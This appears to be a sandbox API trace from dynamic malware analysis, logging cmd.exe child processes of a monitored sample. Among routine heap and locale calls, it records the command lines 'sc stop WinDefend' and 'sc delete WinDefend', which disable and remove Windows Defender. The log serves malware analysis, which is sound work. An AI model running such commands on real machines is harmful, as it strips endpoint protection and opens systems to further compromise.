	[0055.550] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x463b10 | out: hHeap=0x450000) returned 1
	[0055.550] GetConsoleOutputCP () returned 0x1b5
	[0055.761] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1
	[0055.761] GetUserDefaultLCID () returned 0x409
	[0055.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a854950, cchData=8 | out: lpLCData=":") returned 2
	[0055.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2bfb5c, cchData=128 | out: lpLCData="0") returned 2
	[0055.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2bfb5c, cchData=128 | out: lpLCData="0") returned 2
	[0055.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2bfb5c, cchData=128 | out: lpLCData="1") returned 2
	[0055.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a854940, cchData=8 | out: lpLCData="/") returned 2
	[0055.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a854d80, cchData=32 | out: lpLCData="Mon") returned 4
	[0055.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a854d40, cchData=32 | out: lpLCData="Tue") returned 4
	[0055.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a854d00, cchData=32 | out: lpLCData="Wed") returned 4
	[0055.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a854cc0, cchData=32 | out: lpLCData="Thu") returned 4
	[0055.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a854c80, cchData=32 | out: lpLCData="Fri") returned 4
	[0055.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a854c40, cchData=32 | out: lpLCData="Sat") returned 4
	[0055.761] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a854c00, cchData=32 | out: lpLCData="Sun") returned 4
	[0055.761] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a854930, cchData=8 | out: lpLCData=".") returned 2
	[0055.761] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a854920, cchData=8 | out: lpLCData=",") returned 2
	[0055.761] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0055.762] GetProcessHeap () returned 0x450000
	[0055.762] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20c) returned 0x462908
	[0055.762] GetConsoleTitleW (in: lpConsoleTitle=0x462908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0055.763] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0055.763] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b4ac6c
	[0055.763] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0055.763] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b62732
	[0055.763] GetProcessHeap () returned 0x450000
	[0055.763] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x400a) returned 0x463b10
	[0055.763] GetProcessHeap () returned 0x450000
	[0055.763] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x463b10 | out: hHeap=0x450000) returned 1
	[0055.763] _wcsicmp (_String1="sc", _String2=")") returned 74
	[0055.763] _wcsicmp (_String1="FOR", _String2="sc") returned -13
	[0055.763] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13
	[0055.763] _wcsicmp (_String1="IF", _String2="sc") returned -10
	[0055.763] _wcsicmp (_String1="IF/?", _String2="sc") returned -10
	[0055.763] _wcsicmp (_String1="REM", _String2="sc") returned -1
	[0055.763] _wcsicmp (_String1="REM/?", _String2="sc") returned -1
	[0055.763] GetProcessHeap () returned 0x450000
	[0055.764] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x58) returned 0x462b20
	[0055.764] GetProcessHeap () returned 0x450000
	[0055.764] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xe) returned 0x45d5a0
	[0055.764] GetProcessHeap () returned 0x450000
	[0055.764] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x28) returned 0x462b80
	[0055.764] GetConsoleTitleW (in: lpConsoleTitle=0x2bf854, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0055.764] _wcsicmp (_String1="sc", _String2="DIR") returned 15
	[0055.764] _wcsicmp (_String1="sc", _String2="ERASE") returned 14
	[0055.764] _wcsicmp (_String1="sc", _String2="DEL") returned 15
	[0055.765] _wcsicmp (_String1="sc", _String2="TYPE") returned -1
	[0055.765] _wcsicmp (_String1="sc", _String2="COPY") returned 16
	[0055.765] _wcsicmp (_String1="sc", _String2="CD") returned 16
	[0055.765] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16
	[0055.765] _wcsicmp (_String1="sc", _String2="RENAME") returned 1
	[0055.765] _wcsicmp (_String1="sc", _String2="REN") returned 1
	[0055.765] _wcsicmp (_String1="sc", _String2="ECHO") returned 14
	[0055.765] _wcsicmp (_String1="sc", _String2="SET") returned -2
	[0055.765] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3
	[0055.765] _wcsicmp (_String1="sc", _String2="DATE") returned 15
	[0055.765] _wcsicmp (_String1="sc", _String2="TIME") returned -1
	[0055.765] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3
	[0055.765] _wcsicmp (_String1="sc", _String2="MD") returned 6
	[0055.765] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6
	[0055.765] _wcsicmp (_String1="sc", _String2="RD") returned 1
	[0055.765] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1
	[0055.765] _wcsicmp (_String1="sc", _String2="PATH") returned 3
	[0055.765] _wcsicmp (_String1="sc", _String2="GOTO") returned 12
	[0055.765] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5
	[0055.765] _wcsicmp (_String1="sc", _String2="CLS") returned 16
	[0055.765] _wcsicmp (_String1="sc", _String2="CALL") returned 16
	[0055.765] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3
	[0055.765] _wcsicmp (_String1="sc", _String2="VER") returned -3
	[0055.765] _wcsicmp (_String1="sc", _String2="VOL") returned -3
	[0055.765] _wcsicmp (_String1="sc", _String2="EXIT") returned 14
	[0055.765] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2
	[0055.765] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14
	[0055.765] _wcsicmp (_String1="sc", _String2="TITLE") returned -1
	[0055.765] _wcsicmp (_String1="sc", _String2="START") returned -17
	[0055.765] _wcsicmp (_String1="sc", _String2="DPATH") returned 15
	[0055.765] _wcsicmp (_String1="sc", _String2="KEYS") returned 8
	[0055.765] _wcsicmp (_String1="sc", _String2="MOVE") returned 6
	[0055.765] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3
	[0055.765] _wcsicmp (_String1="sc", _String2="POPD") returned 3
	[0055.765] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18
	[0055.765] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13
	[0055.765] _wcsicmp (_String1="sc", _String2="BREAK") returned 17
	[0055.765] _wcsicmp (_String1="sc", _String2="COLOR") returned 16
	[0055.765] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6
	[0055.765] _wcsicmp (_String1="sc", _String2="DIR") returned 15
	[0055.765] _wcsicmp (_String1="sc", _String2="ERASE") returned 14
	[0055.765] _wcsicmp (_String1="sc", _String2="DEL") returned 15
	[0055.765] _wcsicmp (_String1="sc", _String2="TYPE") returned -1
	[0055.765] _wcsicmp (_String1="sc", _String2="COPY") returned 16
	[0055.766] _wcsicmp (_String1="sc", _String2="CD") returned 16
	[0055.766] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16
	[0055.766] _wcsicmp (_String1="sc", _String2="RENAME") returned 1
	[0055.766] _wcsicmp (_String1="sc", _String2="REN") returned 1
	[0055.766] _wcsicmp (_String1="sc", _String2="ECHO") returned 14
	[0055.766] _wcsicmp (_String1="sc", _String2="SET") returned -2
	[0055.766] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3
	[0055.766] _wcsicmp (_String1="sc", _String2="DATE") returned 15
	[0055.766] _wcsicmp (_String1="sc", _String2="TIME") returned -1
	[0055.766] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3
	[0055.766] _wcsicmp (_String1="sc", _String2="MD") returned 6
	[0055.766] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6
	[0055.766] _wcsicmp (_String1="sc", _String2="RD") returned 1
	[0055.766] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1
	[0055.766] _wcsicmp (_String1="sc", _String2="PATH") returned 3
	[0055.766] _wcsicmp (_String1="sc", _String2="GOTO") returned 12
	[0055.766] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5
	[0055.766] _wcsicmp (_String1="sc", _String2="CLS") returned 16
	[0055.766] _wcsicmp (_String1="sc", _String2="CALL") returned 16
	[0055.766] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3
	[0055.766] _wcsicmp (_String1="sc", _String2="VER") returned -3
	[0055.766] _wcsicmp (_String1="sc", _String2="VOL") returned -3
	[0055.766] _wcsicmp (_String1="sc", _String2="EXIT") returned 14
	[0055.766] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2
	[0055.766] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14
	[0055.766] _wcsicmp (_String1="sc", _String2="TITLE") returned -1
	[0055.766] _wcsicmp (_String1="sc", _String2="START") returned -17
	[0055.766] _wcsicmp (_String1="sc", _String2="DPATH") returned 15
	[0055.766] _wcsicmp (_String1="sc", _String2="KEYS") returned 8
	[0055.766] _wcsicmp (_String1="sc", _String2="MOVE") returned 6
	[0055.766] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3
	[0055.766] _wcsicmp (_String1="sc", _String2="POPD") returned 3
	[0055.766] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18
	[0055.766] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13
	[0055.766] _wcsicmp (_String1="sc", _String2="BREAK") returned 17
	[0055.766] _wcsicmp (_String1="sc", _String2="COLOR") returned 16
	[0055.766] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6
	[0055.766] _wcsicmp (_String1="sc", _String2="FOR") returned 13
	[0055.766] _wcsicmp (_String1="sc", _String2="IF") returned 10
	[0055.766] _wcsicmp (_String1="sc", _String2="REM") returned 1
	[0055.767] GetProcessHeap () returned 0x450000
	[0055.767] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x210) returned 0x462bb0
	[0055.767] GetProcessHeap () returned 0x450000
	[0055.767] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x2e) returned 0x462dc8
	[0055.767] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16
	[0055.767] GetProcessHeap () returned 0x450000
	[0055.767] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x418) returned 0x4507f0
	[0055.767] SetErrorMode (uMode=0x0) returned 0x0
	[0055.767] SetErrorMode (uMode=0x1) returned 0x0
	[0055.767] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4507f8, lpFilePart=0x2bf374 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2bf374*="system32") returned 0x13
	[0055.767] SetErrorMode (uMode=0x0) returned 0x1
	[0055.767] GetProcessHeap () returned 0x450000
	[0055.767] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4507f0, Size=0x36) returned 0x4507f0
	[0055.767] GetProcessHeap () returned 0x450000
	[0055.767] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x4507f0) returned 0x36
	[0055.767] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0055.767] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0055.767] GetProcessHeap () returned 0x450000
	[0055.767] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x144) returned 0x462e00
	[0055.767] GetProcessHeap () returned 0x450000
	[0055.767] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x280) returned 0x450830
	[0055.772] GetProcessHeap () returned 0x450000
	[0055.772] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x450830, Size=0x146) returned 0x450830
	[0055.772] GetProcessHeap () returned 0x450000
	[0055.772] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x450830) returned 0x146
	[0055.772] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0055.772] GetProcessHeap () returned 0x450000
	[0055.773] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xe0) returned 0x462f50
	[0055.773] GetProcessHeap () returned 0x450000
	[0055.773] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x462f50, Size=0x76) returned 0x462f50
	[0055.773] GetProcessHeap () returned 0x450000
	[0055.773] RtlSizeHeap (HeapHandle=0x450000, Flags=0x0, MemoryPointer=0x462f50) returned 0x76
	[0055.773] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.773] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x2bf0f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bf0f0) returned 0x462fd0
	[0055.774] GetProcessHeap () returned 0x450000
	[0055.774] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x463010
	[0055.774] FindClose (in: hFindFile=0x462fd0 | out: hFindFile=0x462fd0) returned 1
	[0055.774] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x2bf0f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bf0f0) returned 0xffffffff
	[0055.774] GetLastError () returned 0x2
	[0055.774] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x2bf0f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2bf0f0) returned 0x462fd0
	[0055.774] GetProcessHeap () returned 0x450000
	[0055.774] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x463010, Size=0x4) returned 0x463010
	[0055.774] FindClose (in: hFindFile=0x462fd0 | out: hFindFile=0x462fd0) returned 1
	[0055.774] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0055.774] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0055.774] GetConsoleTitleW (in: lpConsoleTitle=0x2bf5e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0055.774] InitializeProcThreadAttributeList (in: lpAttributeList=0x2bf470, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2bf538 | out: lpAttributeList=0x2bf470, lpSize=0x2bf538) returned 1
	[0055.774] UpdateProcThreadAttribute (in: lpAttributeList=0x2bf470, dwFlags=0x0, Attribute=0x60001, lpValue=0x2bf530, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2bf470, lpPreviousValue=0x0) returned 1
	[0055.774] GetStartupInfoW (in: lpStartupInfo=0x2bf42c | out: lpStartupInfo=0x2bf42c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) 
	[0055.774] GetProcessHeap () returned 0x450000
	[0055.774] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x18) returned 0x462fd0
	[0055.774] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0055.774] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0055.774] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0055.775] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0055.775] GetProcessHeap () returned 0x450000
	[0055.775] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x462fd0 | out: hHeap=0x450000) returned 1
	[0055.775] GetProcessHeap () returned 0x450000
	[0055.775] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xa) returned 0x45d5b8
	[0055.775] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1
	[0055.776] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc  stop WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x2bf4cc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc  stop WinDefend", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2bf518 | out: lpCommandLine="sc  stop WinDefend", lpProcessInformation=0x2bf518*(hProcess=0x50, hThread=0x4c, dwProcessId=0x83c, dwThreadId=0x134)) returned 1
	[0055.780] CloseHandle (hObject=0x4c) returned 1
	[0055.780] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0055.780] GetProcessHeap () returned 0x450000
	[0055.780] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x461f80 | out: hHeap=0x450000) returned 1
	[0055.780] GetEnvironmentStringsW () returned 0x461f80*
	[0055.780] GetProcessHeap () returned 0x450000
	[0055.780] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x942) returned 0x460250
	[0055.780] FreeEnvironmentStringsW (penv=0x461f80) returned 1
	[0055.780] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0
	[0056.094] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2bf40c | out: lpExitCode=0x2bf40c*=0x0) returned 1
	[0056.094] CloseHandle (hObject=0x50) returned 1
	[0056.094] _vsnwprintf (in: _Buffer=0x2bf554, _BufferCount=0x13, _Format="%08X", _ArgList=0x2bf418 | out: _Buffer="00000000") returned 8
	[0056.094] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
	[0056.094] GetProcessHeap () returned 0x450000
	[0056.094] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x460250 | out: hHeap=0x450000) returned 1
	[0056.094] GetEnvironmentStringsW () returned 0x463148*
	[0056.094] GetProcessHeap () returned 0x450000
	[0056.094] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x968) returned 0x460250
	[0056.094] FreeEnvironmentStringsW (penv=0x463148) returned 1
	[0056.094] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0056.094] GetProcessHeap () returned 0x450000
	[0056.094] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x460250 | out: hHeap=0x450000) returned 1
	[0056.094] GetEnvironmentStringsW () returned 0x463148*
	[0056.094] GetProcessHeap () returned 0x450000
	[0056.094] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x968) returned 0x460250
	[0056.094] FreeEnvironmentStringsW (penv=0x463148) returned 1
	[0056.094] GetProcessHeap () returned 0x450000
	[0056.095] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45d5b8 | out: hHeap=0x450000) returned 1
	[0056.095] DeleteProcThreadAttributeList (in: lpAttributeList=0x2bf470 | out: lpAttributeList=0x2bf470) 
	[0056.095] _get_osfhandle (_FileHandle=1) returned 0x7
	[0056.095] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0056.095] _get_osfhandle (_FileHandle=1) returned 0x7
	[0056.095] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1
	[0056.095] _get_osfhandle (_FileHandle=0) returned 0x3
	[0056.095] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1
	[0056.095] SetConsoleInputExeNameW () returned 0x1
	[0056.095] GetConsoleOutputCP () returned 0x1b5
	[0056.095] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1
	[0056.096] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0056.096] exit (_Code=0) 

Process:
	id = "18"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x7ee17760"
	os_pid = "0xffc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "15"
	os_parent_pid = "0xfac"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c sc delete WinDefend"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 56
	os_tid = 0x818

	[0056.208] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x27f7f8 | out: lpSystemTimeAsFileTime=0x27f7f8*(dwLowDateTime=0xcc4d900, dwHighDateTime=0x1d50a6a)) 
	[0056.208] GetCurrentProcessId () returned 0xffc
	[0056.208] GetCurrentThreadId () returned 0x818
	[0056.208] GetTickCount () returned 0xa6699e
	[0056.208] QueryPerformanceCounter (in: lpPerformanceCount=0x27f7f0 | out: lpPerformanceCount=0x27f7f0*=13004619591) returned 1
	[0056.209] GetModuleHandleA (lpModuleName=0x0) returned 0x4a830000
	[0056.209] __set_app_type (_Type=0x1) 
	[0056.209] __p__fmode () returned 0x770231f4
	[0056.209] __p__commode () returned 0x770231fc
	[0056.210] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8521a6) returned 0x0
	[0056.210] __getmainargs (in: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c, _DoWildCard=0, _StartInfo=0x4a854140 | out: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c) returned 0
	[0056.210] GetCurrentThreadId () returned 0x818
	[0056.210] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x818) returned 0x38
	[0056.210] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0056.210] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b624c2
	[0056.210] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0056.210] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0056.210] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x27f788 | out: phkResult=0x27f788*=0x0) returned 0x2
	[0056.211] VirtualQuery (in: lpAddress=0x27f7bf, lpBuffer=0x27f758, dwLength=0x1c | out: lpBuffer=0x27f758*(BaseAddress=0x27f000, AllocationBase=0x180000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0056.211] VirtualQuery (in: lpAddress=0x180000, lpBuffer=0x27f758, dwLength=0x1c | out: lpBuffer=0x27f758*(BaseAddress=0x180000, AllocationBase=0x180000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
	[0056.211] VirtualQuery (in: lpAddress=0x181000, lpBuffer=0x27f758, dwLength=0x1c | out: lpBuffer=0x27f758*(BaseAddress=0x181000, AllocationBase=0x180000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0056.211] VirtualQuery (in: lpAddress=0x183000, lpBuffer=0x27f758, dwLength=0x1c | out: lpBuffer=0x27f758*(BaseAddress=0x183000, AllocationBase=0x180000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0056.211] VirtualQuery (in: lpAddress=0x280000, lpBuffer=0x27f758, dwLength=0x1c | out: lpBuffer=0x27f758*(BaseAddress=0x280000, AllocationBase=0x280000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c
	[0056.211] GetConsoleOutputCP () returned 0x1b5
	[0056.211] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1
